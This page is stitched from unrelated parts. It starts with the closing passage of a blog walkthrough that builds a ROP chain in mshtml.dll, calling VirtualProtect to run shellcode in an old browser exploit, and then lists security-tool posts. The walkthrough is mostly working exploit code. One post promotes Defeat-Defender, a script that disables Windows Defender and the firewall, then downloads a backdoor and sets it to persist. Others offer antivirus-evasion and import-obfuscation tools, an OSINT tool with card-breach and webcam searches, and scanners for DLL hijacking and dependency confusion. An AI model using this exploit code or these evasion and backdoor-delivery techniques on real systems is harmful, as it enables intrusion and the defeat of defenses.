We also know that the distance between the value in ECX and where our shellcode starts is 0x4dc, or fffffb24 in a negative representation. Recall that if we placed the value 0x4dc on the stack, it would translate to 0x000004dc, which contains NULL bytes, which would break out exploit. This way, we leverage the negative representation of the value, which contains no NULL bytes, and we eventually will perform a negation operation on this value.

So to start, let’s place this negative representation between the current value in ECX, which is the stack address that points to 11111111, or our parameter placeholder for the return address, and our shellcode location (91919191) into EAX.

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place the negative distance between the current value of ECX (which contains the fake return parameter placeholder on the stack) and the shellcode location into EAX 
rop += "\ufc80\uffff";                     // Negative distance described above (fffffc80)

From here, we will perform the negation operation on EAX, which will place the actual value of 0x4dc into EAX.

rop += "\u8cf0\u7504";                     // neg eax ; ret (75048cf0) (mshtml.dll) Place the actual distance to the shellcode into EAX

As mentioned above, we know we want to eventually get the stack address which points to our shellcode into EAX. To do so, we will need to actually add the distance to our shellcode to the address of our return parameter placeholder, which currently is only in ECX. There is a nice ROP gadget that can easily add to EAX in mshtml.dll.

add eax, ebx ; ret

In order to add to EAX, we first need to get distance to our shellcode into EBX. To do this, there is a nice COP gadget available to us.

mov ebx, eax ; call edi

We first are going to start by preparing EDI with a ROP gadget that returns to the stack, as is common with COP.

rop += "\u4d3d\u74c2";                     // pop edi ; ret (74c24d3d) (mshtml.dll) Prepare EDI for a COP gadget 
rop += "\u07be\u74fb";                     // add esp, 0xC ; ret (74fb07be) (mshtml.dll) Return back to the stack and jump over the return address form previous COP gadget

After, let’s then store the distance to our shellcode into EBX, and compensate for the previous COP gadget’s return to the stack.

rop += "\uc0c8\u7512";                     // mov ebx, eax ; call edi (7512c0c8) (mshtml.dll) Place the distance to the shellcode into EBX
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget

We know ECX current holds the address of the parameter placeholder for our return address, which was the base address used in our calculation for the distance between this placeholder and our shellcode. Let’s move that address into EAX.

rop += "\u9449\u750c";                     // mov eax, ecx ; ret (750c9449) (mshtml.dll) Get the return address parameter placeholder stack address back into EAX

Let’s now step through these ROP gadgets in the debugger.

Execution hits EAX first, and the negative distance to our shellcode is loaded into EAX.

After the return to the stack gadget is loaded into EDI, to prepare for the COP gadget, the distance to our shellcode is loaded into EBX. Then, the parameter placeholder address is loaded into EAX.

Since the address of the return address placeholder is in EAX, we can simply add the value of EBX to it, which is the distance from the return address placeholder, to EAX, which will result in the stack address that points to the beginning of our shellcode into EAX. Then, we can leverage the previously used arbitrary write gadget to overwrite what ECX currently points to, which is the stack address pointing to the return address parameter placeholder.

rop += "\u5a6c\u74ce";                     // add eax, ebx ; ret (74ce5a6c) (mshtml.dll) Place the address of the shellcode into EAX
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for the fake return address, with the address of the shellcode

We can see that the address of our shellcode is in EAX now.

Leveraging the arbitrary write gadget, we successfully overwrite the return address parameter placeholder on the stack with the actual argument, which is our shellcode!

Perfect! The next parameter is also easy, as the parameter placeholder is located 4 bytes after the return address (lpAddress). Since we already have a great arbitrary write gadget, we can just increase the target location 4 bytes, so that the parameter placeholder for lpAddress is placed into ECX. Then, since the address of our shellcode is already in EAX, we can just reuse this!

rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for lpAddress, with the address of the shellcode

As we can see, we have now taken care of the lpAddress parameter.

Next up is the size of our shellcode. We will be specifying 0x401 bytes for our shellcode, as this is more than enough for a shell.

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place the negative representation of 0x401 in EAX
rop += "\ufbff\uffff";  				   // Value from above
rop += "\u8cf0\u7504";                     // neg eax ; ret (75048cf0) (mshtml.dll) Place the actual size of the shellcode in EAX
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for dwSize, with the size of our shellcode

Similar to last time, we know we cannot place 0x00000401 on the stack, as it contains NULL bytes. Instead, we load the negative representation into EAX and negate it. We also know the dwSize parameter placeholder is 4 bytes after the lpAddress parameter placeholder. We increase ECX, which has the address of the lpAddress placholder, by 4 bytes to place the dwSize placeholder in ECX. Then, we leverage the same arbitrary write gadget again.

Perfect! We will leverage the exact same routine for the flNewProcect parameter. Instead of the negative value of 0x401 this time, we need to place 0x40 into EAX, which corresponds to the memory constant PAGE_EXECUTE_READWRITE.

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place the negative representation of 0x40 (PAGE_EXECUTE_READWRITE) in EAX
rop += "\uffc0\uffff";  				   // Value from above
rop += "\u8cf0\u7504";                     // neg eax ; ret (75048cf0) (mshtml.dll) Place the actual memory constraint PAGE_EXECUTE_READWRITE in EAX
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for flNewProtect, with PAGE_EXECUTE_READWRITE

Great! The last thing we need to to just overwrite the last parameter placeholder, lpflOldProtect, with any writable address. The .data section of a PE will have memory that is readable and writable. This is where we will go to look for a writable address.

The end of most sections in a PE contain NULL bytes, and that is our target here, which ends up being the address 7515c010. The image above shows us the .data section begins at mshtml+534000. We can also see it is 889C bytes in size. Knowing this, we can just access .data+8000, which should be near the end of the section.

The routine here is identical to the previous two ROP routines, except there is no negation operation that needs to take place. We simply just need to pop this address into EAX and leverage our same, trusty arbitrary write gadget to overwrite the last parameter placeholder.

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place a writable .data section address into EAX for lpflOldPRotect
rop += "\uc010\u7515";  				   // Value from above (7515c010)
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for lpflOldProtect, with an address that is writable

Awesome! We have fully instrumented our call to VirtualProtect. All that is left now is to kick off execution by returning into the VirtualProtect address on the stack. To do this, we will just need to load the stack address which points to VirtualProtect into EAX. From there, we can execute an xchg eax, esp ; ret gadget, just like at the beginning of our ROP chain, to return back into the VirtualProtect address, kicking off our function call. We know currently ECX contains the stack address pointing to the last parameter, lpflOldProtect.

We can see that our current value in ECX is 0x14 bytes in front of the VirtualProtect stack address. This means we can leverage several dec ecx ; ret ROP gadgets to get ECX 0x14 bytes lower. From there, we can then move the ECDX register into the EAX register, where we can perform the exchange.

rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\u9449\u750c";                     // mov eax, ecx ; ret (750c9449) (mshtml.dll) Get the stack address of VirtualProtect into EAX
rop += "\ua1ea\u74c7";                     // xchg esp, eax ; ret (74c7a1ea) (mshtml.dll) Kick off the function call

We can also replace our shellcode with some software breakpoints to confirm our ROP chain worked.

// Create a placeholder for our shellcode, 0x400 in size
shellcode = "\uCCCC\uCCCC";

for (i=0; i < 0x396/4-1; i++)
shellcode += "\uCCCC\uCCCC";

After ECX is incremented, we can see that it now contains the VirtualProtect stack address. This is then passed to EAX, which then is exchanged with ESP to load the function call into ESP! The, the ret part of the gadget takes the value at ESP, which is VirtualProtect, and loads it into EIP and we get successful code execution!

After replacing our software breakpoints with meaningful shellcode, we successfully obtain remote access!


I know this was a very long winded blog post. It has been a bit disheartening to see a lack of beginning to end walkthroughs on Windows browser exploitation, and I hope I can contribute my piece to helping those out who want to get into it, but are intimidated, as I am myself. Even though we are working on legacy systems, I hope this can be of some use. If nothing else, this is how I document and learn. I am excited to continue to grow and learn more about browser exploitation! Until next time.

Peace, love, and positivity :-)

Defeat-Defender - Powerful Batch Script To Dismantle Complete Windows Defender Protection And Even Bypass Tamper Protection

15 April 2021 at 21:30
By: Zion3R

Powerfull Batch File To Disable Windows Defender,Firewall,Smartscreen And Execute the payload

Usage :
  1. Edit Defeat-Defender.bat on this line and replace the direct url of your payload
  2. Run the script "run.vbs" . It will ask for Admin Permission.If permission Granted The script will work Silently without console windows...

After it got admin permission it will disable defender
  1. PUAProtection
  2. Automatic Sample Submission
  3. Windows FireWall
  4. Windows Smart Screen(Permanently)
  5. Disable Quickscan
  6. Add exe file to exclusions in defender settings
  7. Disable Ransomware Protection

Virus Total Result :

Bypasssing Windows-Defender Techniques :

Recently Windows Introduced new Feature called "Tamper Protection".Which Prevents the disable of real-time protection and modifying defender registry keys using powershell or cmd...If you need to disable real-time protection you need to do manually....But We will disable Real Time Protection using NSudo without trigerring Windows Defender

After Running Defeat-Defender Script

Tested on Windows Version 20H2

Behind The Scenes :

When Batch file is executed it ask for admin permissions.After getting admin privileage it starts to disable windows defender real time protectin , firewall , smartscreen and starts downloading our backdoor from server and it will placed in startup folder.The backdoor will be executed after it has downloaded from server..And will be started whenever system starts..

Check out this article :

Scylla - The Simplistic Information Gathering Engine | Find Advanced Information On A Username, Website, Phone Number, Etc...

6 April 2021 at 12:30
By: Zion3R

Scylla is an OSINT tool developed in Python 3.6. Scylla lets users perform advanced searches on Instagram & Twitter accounts, websites/webservers, phone numbers, and names. Scylla also allows users to find all social media profiles (main platforms) assigned to a certain username. In continuation, Scylla has shodan support so you can search for devices all over the internet, it also has in-depth geolocation capabilities. Lastly, Scylla has a finance section which allows users to check if a credit/debit card number has been leaked/pasted in a breach and returns information on the cards IIN/BIN. This is the first version of the tool so please contact the developer if you want to help contribute and add more to Scylla.


1: git clone
2: cd Scylla
3: sudo python3 -m pip install -r requirments.txt
4: python3 --help

  1. python3 --instagram davesmith --twitter davesmith
    Command 1 will return account information of that specified Instagram & Twitter account.
  2. python3 --username johndoe
    Command 2 will return all the social media (main platforms) profiles associated with that username.
  3. python3 --username johndoe -l="john doe"
    Command 3 will repeat command 2 but instead it will also perform an in-depth google search for the "-l" argument. NOTE: When searching a query with spaces make sure you add the equal sign followed by the query in quotations. If your query does not have spaces, it will be as such: python3 --username johndoe -l query
  4. python3 --info
    Command 4 will return crucial WHOIS information about the webserver/website.
  5. python3 -r +14167777777
    Command 5 will dump information on that phone number (Carrier, Location, etc.)
  6. python3 -s apache
    Command 6 will dump all the IP address of apache servers that shodan can grab based on your API key. The query can be anything that shodan can validate.
    A Sample API key is given. I will recommend reading API NOTICE below, for more information.
  7. python3 -s webcamxp
    Command 7 will dump all the IP addresses and ports of open webcams on the internet that shodan can grab based on your API key. You can also just use the webcam query but webcamxp returns better results.
    A Sample API key is given. I will recommend reading API NOTICE below, for more information.
  8. python3 -g
    Command 8 will geolocate the specified IP address. It will return the longitude & latitude, city, state/province, country, zip/postal code region and the district.
  9. python3 -c 123456789123456
    Command 9 will retrieve information on the IIN of the credit/debit card number entered. It will also check if the card number has been leaked/pasted in a breach. Scylla will return the card brand, card scheme, card type, currency, country, and information on the bank of that IIN. NOTE: Enter the full card number if you will like to see if it was leaked. If you just want to check data on the first 6-8 digits (a.k.a the BIN/IIN number) just input the first 6,7 or 8 digits of the credit/debit card number. Lastly, all this information generated is public because this is an OSINT tool, and no revealing details can be generated. This prevents malicous use of this option.

usage: [-h] [-v] [-ig INSTAGRAM] [-tw TWITTER] [-u USERNAME]

optional arguments:
-h, --help show this help message and exit
-v, --version returns scyla's version
-ig INSTAGRAM, --instagram INSTAGRAM
return the information associated with specified
instagram account
-tw TWITTER, --twitter TWITTER
return the information associated with specified
twitter account
-u USERNAME, --username USERNAME
find social media profiles (main platforms) associated
with given username
--info INFO return information about the specified website(WHOIS)
w/ geolocation
return information about the specified phone number
(reverse lookup)
-l LOOKUP, --lookup LOOKUP
performs a google search of the 35 top items for the
argument given
-s SHODAN_QUERY, --shodan_query SHODAN_QUERY
performs a an in-depth shodan search on any simple
query (i.e, 'webcamxp', 'voip', 'printer', 'apache')
-g GEO, --geo GEO geolocates a given IP address. provides: longitude,
latitude, city, country, zipcode, district, etc.
-c CARD_INFO, --card_info CARD_INFO
check if the credit/debit card number has been pasted
in a breach...dumps sites. Also returns bank
information on the IIN


The API used for the reverse phone number lookup (free package) has maximum 250 requests. The one used in the program right now will most definetely run out of uses in the near future. If you want to keep generating API keys, go to, and select the free plan after creating an account. Then simply go and replace the original API key with your new API key found in your account dashboard. Insert your new key into the keys[] array (at the top of the source). For the Shodan API key, it is just a sample key given to the program. The developer recommends creating a shodan account and adding your own API key to the shodan_api[] array at the top of the source (

Discord Server

Ethical Notice

The developer of this program, Josh Schiavone, written the following code for educational and OSINT purposes only. The information generated is not to be used in a way to harm, stalk or threaten others. Josh Schiavone is not responsible for misuse of this program. May God bless you all.

DefenderCheck - Identifies The Bytes That Microsoft Defender Flags On

3 April 2021 at 20:30
By: Zion3R

Quick tool to help make evasion work a little bit easier.

Takes a binary as input and splits it until it pinpoints that exact byte that Microsoft Defender will flag on, and then prints those offending bytes to the screen. This can be helpful when trying to identify the specific bad pieces of code in your tool/payload.

Note: Defender must be enabled on your system, but the realtime protection and automatic sample submission features should be disabled.

CallObfuscator - Obfuscate Specific Windows Apis With Different APIs

28 March 2021 at 11:30
By: Zion3R

Obfuscate (hide) the PE imports from static/dynamic analysis tools.


This's pretty forward, let's say I've used VirtualProtect and I want to obfuscate it with Sleep, the tool will manipulate the IAT so that the thunk that points to VirtualProtect will point instead to Sleep, now at executing the file, windows loader will load Sleep instead of VirtualProtect, and moves the execution to the entry point, from there the execution will be redirected to the shellcode, the tool put before, to find the address of VirtualProtect and use it to replace the address of Sleep which assigned before by the loader.

How to use
  • It can be included directly as a library, see the following snippet (based on the example), also you can take a look at cli.cpp.
#include <cobf.hpp>

int main() {
cobf obf_file = cobf("sample.exe");
obf_file.obf_sym("kernel32.dll", "SetLastError", "Beep");
obf_file.obf_sym("kernel32.dll", "GetLastError", "GetACP");
return 0;
  • Also can be used as a command line tool by supplying it with the input PE path, the output PE path and optionally the path to the configuration file (default is config.ini).
    cobf.exe <input file> <out file> [config file]
    The config file contains the obfuscations needed (dlls, symbols, ...).
    Here is a template for the config file content
; Template for the config file:
; * Sections can be written as:
; [dll_name]
; old_sym=new_sym
; * The dll name is case insensitive, but
; the old and the new symbols are not.
; * You can use the wildcard on both the
; dll name and the old symbol.
; * You can use '#' at the start of
; the old or the new symbol to flag
; an ordinal.
; * The new symbol should be exported
; by the dll so the windows loader can resolve it.
; For example:
; * Obfuscating all of the symbols
; imported from user32.dll with ordinal 1600.
; * Obfuscating symbols imported from both
; kernel32.dll and kernelbase.dll with Sleep.
; * Obfuscating fprintf with exit.


Build this code sample

#include <windows.h>
#include <stdio.h>

int main() {
printf("Last error is %d\n", GetLastError());
return 0;

After building it, this is how the kernel32 imports look like

Now let's obfuscate both SetLastError and GetLastError with Beep and GetACP (actually any api from kernel32 will be ok even if it's not imported at all).
The used configurations are


Here is the output (also you can use the library directly as shown above).

Again let's have a look on the kernel32 imports

There's no existence of SetLastError or GetLastError
A confirmation that two files will work properly


IDA HexRays Decompiler

IDA Debugger





That's because all of the static analysis tool depend on what is the api name written at IAT which can be manipulated as shown.
For ApiMonitor, because of using IAT hooking, the same problem exists.

On the other side, for tools like x64dbg the shown api names will only depend on what is actually called (not what written at the IAT).

  • Dumping the obfuscated PE out from memory won't deobfuscate it, because the manipulated IAT will be the same.
  • The main purpose for this tool is to mess up with the analysis process (make it slower).
  • One can obfuscate any imported symbol (by name or by ordinal) with another symbol (name or ordinal).
  • The shellcode is executed as the first tls callback to process the obfuscated symbols needed by the other tls callbacks before the entry point is executed.
  • The shellcode is shipped as c code, generated when the tool is compiled to facilitate editing it.
  • The obfuscated symbols names are being resolved by hash not by name directly.
  • The tool disables the relocations and strips any of the debug symbols.
  • The tool creates a new rwx section named .cobf for holding the shellcode and the other needed datas.
  • It can be used multiple times on the same obfuscated PE.
  • Tested only on Windows 10 x64.
  • Get source with git clone
  • Download binaries from the Release Section.

  • Shellcode obfuscation (probably with obfusion).
  • Support the delay-loaded symbols.
  • Minimize the created section size.
  • Compile time hashing.
  • Better testing.

Retoolkit - Reverse Engineer's Toolkit

26 March 2021 at 11:30
By: Zion3R

This is a collection of tools you may like if you are interested on reverse engineering and/or malware analysis on x86 and x64 Windows systems. After installing this toolkit you'll have a folder in your desktop with shortcuts to RE tools like these:

Why do I need it?

You don't. Obviously, you can download such tools from their own website and install them by yourself in a new VM. But if you download retoolkit, it can probably save you some time. Additionally, the tools come pre-configured so you'll find things like x64dbg with a few plugins, command-line tools working from any directory, etc. You may like it if you're setting up a new analysis VM.


The *.iss files you see here are the source code for our setup program built with Inno Setup. To download the real thing, you have to go to the Releases section and download the setup program.

Included tools

Check the wiki.

Is it safe to install it in my environment?

I don't know. Some included tools are not open source and come from shady places. You should use it exclusively in virtual machines and under your own responsibility.

Can you add tool X?

It depends. The idea is to keep it simple. We won't add a tool just because it's not here yet. But if you think there's a good reason to do so, and the license allows us to redistribuite the software, please file a request here.

Confused - Tool To Check For Dependency Confusion Vulnerabilities In Multiple Package Management Systems

15 March 2021 at 20:30
By: Zion3R

A tool for checking for lingering free namespaces for private package names referenced in dependency configuration for Python (pypi) requirements.txt, JavaScript (npm) package.json, PHP (composer) composer.json or MVN (maven) pom.xml.

What is this all about?

On 9th of February 2021, a security researcher Alex Birsan published an article that touched different resolve order flaws in dependency management tools present in multiple programming language ecosystems.

Microsoft released a whitepaper describing ways to mitigate the impact, while the root cause still remains.

Interpreting the tool output

confused simply reads through a dependency definition file of an application and checks the public package repositories for each dependency entry in that file. It will proceed to report all the package names that are not found in the public repositories - a state that implies that a package might be vulnerable to this kind of attack, while this vector has not yet been exploited.

This however doesn't mean that an application isn't already being actively exploited. If you know your software is using private package repositories, you should ensure that the namespaces for your private packages have been claimed by a trusted party (typically yourself or your company).

Known false positives

Some packaging ecosystems like npm have a concept called "scopes" that can be either private or public. In short it means a namespace that has an upper level - the scope. The scopes are not inherently visible publicly, which means that confused cannot reliably detect if it has been claimed. If your application uses scoped package names, you should ensure that a trusted party has claimed the scope name in the public repositories.


./confused [-l LANGUAGENAME] depfilename.ext

Usage of ./confused:
-l string
Package repository system. Possible values: "pip", "npm", "composer", "mvn" (default "npm")
-s string
Comma-separated list of known-secure namespaces. Supports wildcards
-v Verbose output


Python (PyPI)
./confused -l pip requirements.txt

Issues found, the following packages are not available in public package repositories:
[!] internal_package1

JavaScript (npm)
./confused -l npm package.json

Issues found, the following packages are not available in public package repositories:
[!] internal_package1
[!] @mycompany/internal_package1
[!] @mycompany/internal_package2

# Example when @mycompany private scope has been registered in npm, using -s
./confused -l npm -s '@mycompany/*' package.json

Issues found, the following packages are not available in public package repositories:
[!] internal_package1

Maven (mvn)
./confused -l mvn pom.xml

Issues found, the following packages are not available in public package repositories:
[!] internal
[!] internal/package1
[!] internal/_package2

DLLHSC - DLL Hijack SCanner A Tool To Assist With The Discovery Of Suitable Candidates For DLL Hijacking

15 March 2021 at 11:30
By: Zion3R

DLL Hijack SCanner - A tool to generate leads and automate the discovery of candidates for DLL Search Order Hijacking

Contents of this repository

This repository hosts the Visual Studio project file for the tool (DLLHSC), the project file for the API hooking functionality (detour), the project file for the payload and last but not least the compiled executables for x86 and x64 architecture (in the release section of this repo). The code was written and compiled with Visual Studio Community 2019.

If you choose to compile the tool from source, you will need to compile the projects DLLHSC, detour and payload. The DLLHSC implements the core functionality of this tool. The detour project generates a DLL that is used to hook APIs. And the payload project generates the DLL that is used as a proof of concept to check if the tested executable can load it via search order hijacking. The generated payload has to be placed in the same directory with DLLHSC and detour named payload32.dll for x86 and payload64.dll for x64 architecture.

Modes of operation

The tool implements 3 modes of operation which are explained below.

Lightweight Mode

Loads the executable image in memory, parses the Import table and then replaces any DLL referred in the Import table with a payload DLL.

The tool places in the application directory only a module (DLL) the is not present in the application directory, does not belong to WinSxS and does not belong to the KnownDLLs.

The payload DLL upon execution, creates a file in the following path: C:\Users\%USERNAME%\AppData\Local\Temp\DLLHSC.tmp as a proof of execution. The tool launches the application and reports if the payload DLL was executed by checking if the temporary file exists. As some executables import functions from the DLLs they load, error message boxes may be shown up when the provided DLL fails to export these functions and thus meet the dependencies of the provided image. However, the message boxes indicate the DLL may be a good candidate for payload execution if the dependencies are met. In this case, additional analysis is required. The title of these message boxes may contain the strings: Ordinal Not Found or Entry Point Not Found. DLLHSC looks for windows that contain these strings, closes them as soon as they shown up and reports the results.

List Modules Mode

Creates a process with the provided executable image, enumerates the modules that are loaded in the address space of this process and reports the results after applying filters.

The tool only reports the modules loaded from the System directory and do not belong to the KnownDLLs. The results are leads that require additional analysis. The analyst can then place the reported modules in the application directory and check if the application loads the provided module instead.

Run-Time Mode

Hooks the LoadLibrary and LoadLibraryEx APIs via Microsoft Detours and reports the modules that are loaded in run-time.

Each time the scanned application calls LoadLibrary and LoadLibraryEx, the tool intercepts the call and writes the requested module in the file C:\Users\%USERNAME%\AppData\Local\Temp\DLLHSCRTLOG.tmp. If the LoadLibraryEx is specifically called with the flag LOAD_LIBRARY_SEARCH_SYSTEM32, no output is written to the file. After all interceptions have finished, the tool reads the file and prints the results. Of interest for further analysis are modules that do not exist in the KnownDLLs registry key, modules that do not exist in the System directory and modules with no full path (for these modules loader applies the normal search order).

Compile and Run Guidance

Should you choose to compile the tool from source it is recommended to do so on Visual Code Studio 2019. In order the tool to function properly, the projects DLLHSC, detour and payload have to be compiled for the same architecture and then placed in the same directory. Please note that the DLL generated from the project payload has to be renamed to payload32.dll for 32-bit architecture or payload64.dll for 64-bit architecture.

Help menu

The help menu for this application

dllhsc - DLL Hijack SCanner

dllhsc.exe -h

dllhsc.exe -e <executable image path> (-l|-lm|-rt) [-t seconds]

DLLHSC scans a given executable image for DLL Hijacking and reports the results

It requires elevated privileges

-h, --help
display this help menu and exit

-e, --executable-image
executable image to scan

-l, --lightweight
parse the import table, attempt to launch a payload and report the results

-lm, --list-modules
list loaded modules that do not exist in the application's directory

-rt, --runtime-load
display modules loaded in run-time by hooking LoadLibrary and LoadLibraryEx APIs

-t, --timeout
number of seconds to wait f or checking any popup error windows - defaults to 10 seconds

Example Runs

This section provides examples on how you can run DLLHSC and the results it reports. For this purpose, the legitimate Microsoft utility OleView.exe (MD5: D1E6767900C85535F300E08D76AAC9AB) was used. For better results, it is recommended that the provided executable image is scanned within its installation directory.

The flag -l parses the import table of the provided executable, applies filters and attempts to weaponize the imported modules by placing a payload DLL in the application's current directory. The scanned executable may pop an error box when dependencies for the payload DLL (exported functions) are not met. In this case, an error message box is poped. DLLHSC by default checks for 10 seconds if a message box was opened or for as many seconds as specified by the user with the flag -t. An error message box indicates that if dependencies are met, the module can be weaponized.

The following screenshot shows the error message box generated when OleView.dll loads the payload DLL :

The tool waits for a maximum timeframe of 10 seconds or -t seconds to make sure the process initialization has finished and any message box has been generated. It then detects the message box, closes it and reports the result:

The flag -lm launches the provided executable and prints the modules it loads that do not belong in the KnownDLLs list neither are WinSxS dependencies. This mode is aimed to give an idea of DLLs that may be used as payload and it only exists to generate leads for the analyst.

The flag -rt prints the modules the provided executable image loads in its address space when launched as a process. This is achieved by hooking the LoadLibrary and LoadLibraryEx APIs via Microsoft Detours.


For any feedback on this tool, please use the GitHub Issues section.